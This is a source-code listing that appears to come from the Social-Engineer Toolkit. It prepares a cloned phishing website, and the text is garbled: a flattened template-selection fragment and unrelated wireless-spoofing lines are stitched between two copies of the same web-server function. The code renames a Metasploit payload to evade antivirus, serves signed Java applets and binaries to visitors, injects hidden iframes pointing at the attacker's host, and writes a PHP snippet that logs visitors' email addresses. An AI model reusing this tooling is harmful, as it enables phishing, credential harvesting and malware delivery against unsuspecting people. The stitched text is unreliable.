core.debug_msg(core.mod_name(), "entering src.html.templates.template'", 1) # # used for pre-defined templates # print(""" 1. Java Required 2. Google 3. Facebook 4. Twitter 5. Yahoo """) choice = raw_input(core.setprompt(["2"], "Select a template")) if choice == "exit": core.exit_set() # file used for nextpage in java applet attack # if nothing is selected if choice == "": choice = "1" # if java required if choice == "1": if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template") url = "" # if google
def web_server_start():
    """Prepare the files for the selected web attack vector and serve them.

    Reads its settings through core.check_config / core.check_options and from
    marker files under core.setdir (meta_config, site.template, attack_vector,
    multi_harvester, docbase.file), stages files into core.setdir/web_clone,
    and then either starts src.core.webserver in a separate process or copies
    the staged files into the configured Apache directory.

    Uses names that are not defined in this block: track_email,
    operating_system, applet_name, definepath and random_string.

    NOTE(review): this listing had lost its line breaks and indentation; the
    nesting below is reconstructed from statement order and comments and
    should be confirmed against the original file.
    """
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            # NOTE(review): the joined path is computed and discarded, so
            # apache_path is not changed by this branch.
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                # "set SRVPORT 80" also matches "set SRVPORT 8080", hence the
                # second search: the web port moves to 8080 only when the
                # line does not already say 8080.
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        # NOTE(review): web_port becomes an int here but is
                        # otherwise whatever check_config returned; the
                        # comparisons with 8080 below depend on that type.
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter your ip address: ")

    # unless we create template do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        # NOTE(review): open() receives core.setdir as the path and
        # "site.template" as the mode argument, which is not a valid mode;
        # os.path.join(core.setdir, "site.template") looks intended.
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    # url is not read again in the visible part of this
                    # function.
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            # The last line of the file wins.
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    # rand_gen replaces the literal file name "msf.exe" in the java branch
    # further down; random_string is defined outside this block.
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    # NOTE(review): the second component starts with "/", so os.path.join
    # discards core.setdir and this tests "/multi_tabnabbing" at the
    # filesystem root.
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        # The path is relative, so this depends on the current working
        # directory, and the process stays in src/html/ afterwards.
        os.chdir("src/html/")
        # remove stale index.html files
        if os.path.isfile("index.html"):
            os.remove("index.html")

        # define files and get ipaddress set in index.html
        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    # The pattern is used as a regex, so "." matches any
                    # character; the replace() below is a literal replace.
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
                    filewrite.write(line)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    # counter records whether this line has already been
                    # written by one of the branches below.
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        filewrite.write(line)
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        # The iframe points at whichever of the two ports
                        # (8080 / 80) is not the web port.
                        if web_port != 8080:
                            line = line.replace("<head>", '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                    if counter == 0:
                        filewrite.write(line)

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
            shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
            # Each file below is copied into web_clone under the name that
            # check_options returns for it.
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
            core.print_status("The site has been moved. SET Web Server is now listening..")
            # NOTE(review): this option key is "MSF_EXE=" while the lookup
            # above uses "MSF.EXE="; confirm both keys exist.
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                    shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
                    print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
                shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        # Two-frame page: site.html plus a frame that loads port 8080 on
        # ipaddr. The literal is reproduced exactly as it appears in this
        # listing. With str.format the doubled percent signs are emitted as
        # written.
        docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr))
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        # The existing index.html becomes site.html and index.html is
        # replaced by the frameset.
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"), os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
            filewrite.write(docbase)

    ##########################################################################
    #
    # START WEB SERVER STUFF HERE
    #
    ##########################################################################

    if not apache:
        if multiattack_harv == 'off':
            try:
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                try:
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                    p.start()
                # NOTE(review): bare except; if the import itself failed,
                # webserver is unbound in this fallback. `thread` is the
                # Python 2 module name and is not imported in this block.
                except:
                    thread.start_new_thread(webserver.start_server, (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:
                core.exit_set()

            # Handle Exceptions
            except Exception as e:
                core.log(e)
                # The two adjacent literals are joined with no separator
                # between "Apache??" and "[!]".
                print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                      "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
                # An empty answer counts as yes.
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
                    try:
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        # NOTE(review): this concatenates core.setdir and
                        # "web_clone" with no separator, unlike the
                        # os.path.join(core.setdir, "web_clone/") above.
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                        p.start()
                    # NOTE(review): bare except; any failure in the retry is
                    # reported as being unable to stop Apache.
                    except:
                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
                        sys.exit()

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                        try:
                            core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
                            input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
                            break

    if apache:
        # NOTE(review): the command line is built by string formatting and
        # run with shell=True. apache_path (from APACHE_DIRECTORY= in the
        # config) and the other paths are interpolated unquoted, so spaces or
        # shell metacharacters in them change what the shell executes.
        # Output is captured and never read, so failed copies go unnoticed.
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
                                                       os.path.join(definepath, "src/html/*.html"),
                                                       os.path.join(core.setdir, "web_clone/*"),
                                                       os.path.join(core.setdir, "msf.exe"),
                                                       os.path.join(core.setdir, "*.jar"),
                                                       apache_path=apache_path),
                         shell=True,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE).wait()

        # if we are tracking users
        if track_email == "on":
            # The file name embeds str(datetime), which contains a space and
            # colons.
            now = datetime.datetime.today()
            # Create the file empty, then hand it to www-data.
            with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
                filewrite.write("")
            # NOTE(review): shell=True again; the path is single-quoted, which
            # still breaks if apache_path contains a single quote.
            subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            # Insert a PHP snippet after <body> that appends the
            # base64-decoded query string to the harvester file, and write
            # the result out as index.php. The doubled braces are literal
            # braces under str.format.
            data = data.replace("<body>",
                                "<body>"
                                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
            with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
                filewrite.write(data)
        core.print_status("All files have been copied to {}".format(apache_path))

    ##########################################################################
    #
    # END WEB SERVER STUFF HERE
    #
    ##########################################################################

    if operating_system != "windows":
        # Grab metaspoit path
        # msf_path is not used in the visible part of this function.
        msf_path = core.meta_path()
except: pass if not os.path.isfile("/etc/init.d/isc-dhcp-server"): core.print_warning("isc-dhcp-server does not appear to be installed.") core.print_warning( "apt-get install isc-dhcp-server to install it. Things may fail now.") if not os.path.isfile(dnsspoof_path): if os.path.isfile("/usr/sbin/dnsspoof"): dnsspoof_path = "/usr/sbin/dnsspoof" else: core.print_warning( "DNSSpoof was not found. Please install or correct path in set_config. Exiting...." ) core.exit_set() if not os.path.isfile(airbase_path): airbase_path = "src/wireless/airbase-ng" core.print_info("using SET's local airbase-ng binary") core.print_info( "For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface." ) core.print_info( """This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""" ) print("") core.print_status("SET will now launch nano to edit the file.") core.print_status( "Press ^X to exit nano and don't forget to save the updated file!")
def web_server_start():
    """Prepare the files for the selected web attack vector and serve them.

    Reads its settings through core.check_config / core.check_options and from
    marker files under core.setdir (meta_config, site.template, attack_vector,
    multi_harvester, docbase.file), stages files into core.setdir/web_clone,
    and then either starts src.core.webserver in a separate process or copies
    the staged files into the configured Apache directory.

    Uses names that are not defined in this block: track_email,
    operating_system, applet_name, definepath and random_string.

    NOTE(review): this listing had lost its line breaks and indentation; the
    nesting below is reconstructed from statement order and comments and
    should be confirmed against the original file.
    """
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            # NOTE(review): the joined path is computed and discarded, so
            # apache_path is not changed by this branch.
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                # "set SRVPORT 80" also matches "set SRVPORT 8080", hence the
                # second search: the web port moves to 8080 only when the
                # line does not already say 8080.
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        # NOTE(review): web_port becomes an int here but is
                        # otherwise whatever check_config returned; the
                        # comparisons with 8080 below depend on that type.
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter your ip address: ")

    # unless we create template do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        # NOTE(review): open() receives core.setdir as the path and
        # "site.template" as the mode argument, which is not a valid mode;
        # os.path.join(core.setdir, "site.template") looks intended.
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    # url is not read again in the visible part of this
                    # function.
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            # The last line of the file wins.
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    # rand_gen replaces the literal file name "msf.exe" in the java branch
    # further down; random_string is defined outside this block.
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    # NOTE(review): the second component starts with "/", so os.path.join
    # discards core.setdir and this tests "/multi_tabnabbing" at the
    # filesystem root.
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        # The path is relative, so this depends on the current working
        # directory, and the process stays in src/html/ afterwards.
        os.chdir("src/html/")
        # remove stale index.html files
        if os.path.isfile("index.html"):
            os.remove("index.html")

        # define files and get ipaddress set in index.html
        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    # The pattern is used as a regex, so "." matches any
                    # character; the replace() below is a literal replace.
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
                    filewrite.write(line)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    # counter records whether this line has already been
                    # written by one of the branches below.
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        filewrite.write(line)
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        # The iframe points at whichever of the two ports
                        # (8080 / 80) is not the web port.
                        if web_port != 8080:
                            line = line.replace(
                                "<head>",
                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
                                .format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                "<head>",
                                '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
                                .format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                    if counter == 0:
                        filewrite.write(line)

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(
                    os.path.join(definepath, "src/html/Signed_Update.jar.orig"),
                    os.path.join(core.setdir, applet_name))
            shutil.copyfile(
                os.path.join(core.setdir, applet_name),
                os.path.join(core.setdir, "web_clone", applet_name))
            # Each file below is copied into web_clone under the name that
            # check_options returns for it.
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
                                os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
                                os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
                                os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
            core.print_status(
                "The site has been moved. SET Web Server is now listening..")
            # NOTE(review): this option key is "MSF_EXE=" while the lookup
            # above uses "MSF.EXE="; confirm both keys exist.
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                    shutil.copyfile(
                        os.path.join(core.setdir, "msf.exe"),
                        os.path.join(core.setdir, "web_clone/msf.exe"))
                    print(
                        "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
                    )
                shutil.copyfile(
                    os.path.join(core.setdir, "web_clone/msf.exe"),
                    os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        # Two-frame page: site.html plus a frame that loads port 8080 on
        # ipaddr. The literal is reproduced exactly as it appears in this
        # listing. With str.format the doubled percent signs are emitted as
        # written.
        docbase = (
            r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <HTML> <HEAD> <TITLE></TITLE> </HEAD> <FRAMESET rows="99%%, 1%%"> <FRAME src="site.html"> <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080"> </FRAMESET> </HTML>""".format(ipaddr))
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        # The existing index.html becomes site.html and index.html is
        # replaced by the frameset.
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
            filewrite.write(docbase)

    ##########################################################################
    #
    # START WEB SERVER STUFF HERE
    #
    ##########################################################################

    if not apache:
        if multiattack_harv == 'off':
            try:
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                try:
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server,
                                                args=(web_port, path))
                    p.start()
                # NOTE(review): bare except; if the import itself failed,
                # webserver is unbound in this fallback. `thread` is the
                # Python 2 module name and is not imported in this block.
                except:
                    thread.start_new_thread(webserver.start_server,
                                            (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:
                core.exit_set()

            # Handle Exceptions
            except Exception as e:
                core.log(e)
                # The two adjacent literals are joined with no separator
                # between "Apache??" and "[!]".
                print(
                    "{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                    "[!] There was an issue, printing error: {1}{2}".format(
                        core.bcolors.RED, e, core.bcolors.ENDC))
                # An empty answer counts as yes.
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop",
                                     shell=True).wait()
                    try:
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        # NOTE(review): this concatenates core.setdir and
                        # "web_clone" with no separator, unlike the
                        # os.path.join(core.setdir, "web_clone/") above.
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(
                            target=webserver.start_server,
                            args=(web_port, path))
                        p.start()
                    # NOTE(review): bare except; any failure in the retry is
                    # reported as being unable to stop Apache.
                    except:
                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
                              format(core.bcolors.RED, core.bcolors.ENDC))
                        sys.exit()

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                        try:
                            core.print_warning(
                                "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
                            )
                            input(
                                "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
                                .format(core.bcolors.GREEN, core.bcolors.ENDC))
                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(
                                core.bcolors.GREEN, core.bcolors.ENDC))
                            break

    if apache:
        # NOTE(review): the command line is built by string formatting and
        # run with shell=True. apache_path (from APACHE_DIRECTORY= in the
        # config) and the other paths are interpolated unquoted, so spaces or
        # shell metacharacters in them change what the shell executes.
        # Output is captured and never read, so failed copies go unnoticed.
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(
                             os.path.join(definepath, "src/html/*.bin"),
                             os.path.join(definepath, "src/html/*.html"),
                             os.path.join(core.setdir, "web_clone/*"),
                             os.path.join(core.setdir, "msf.exe"),
                             os.path.join(core.setdir, "*.jar"),
                             apache_path=apache_path),
                         shell=True,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE).wait()

        # if we are tracking users
        if track_email == "on":
            # The file name embeds str(datetime), which contains a space and
            # colons.
            now = datetime.datetime.today()
            # Create the file empty, then hand it to www-data.
            with open(
                    os.path.join(apache_path, "harvester_{}.txt".format(now)),
                    'w') as filewrite:
                filewrite.write("")
            # NOTE(review): shell=True again; the path is single-quoted, which
            # still breaks if apache_path contains a single quote.
            subprocess.Popen("chown www-data:www-data '{0}'".format(
                os.path.join(apache_path, "harvester_{}.txt".format(now))),
                             shell=True).wait()
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            # Insert a PHP snippet after <body> that appends the
            # base64-decoded query string to the harvester file, and write
            # the result out as index.php. The doubled braces are literal
            # braces under str.format.
            data = data.replace(
                "<body>", "<body>"
                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
                .format(now))
            with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
                filewrite.write(data)
        core.print_status(
            "All files have been copied to {}".format(apache_path))

    ##########################################################################
    #
    # END WEB SERVER STUFF HERE
    #
    ##########################################################################

    if operating_system != "windows":
        # Grab metaspoit path
        # msf_path is not used in the visible part of this function.
        msf_path = core.meta_path()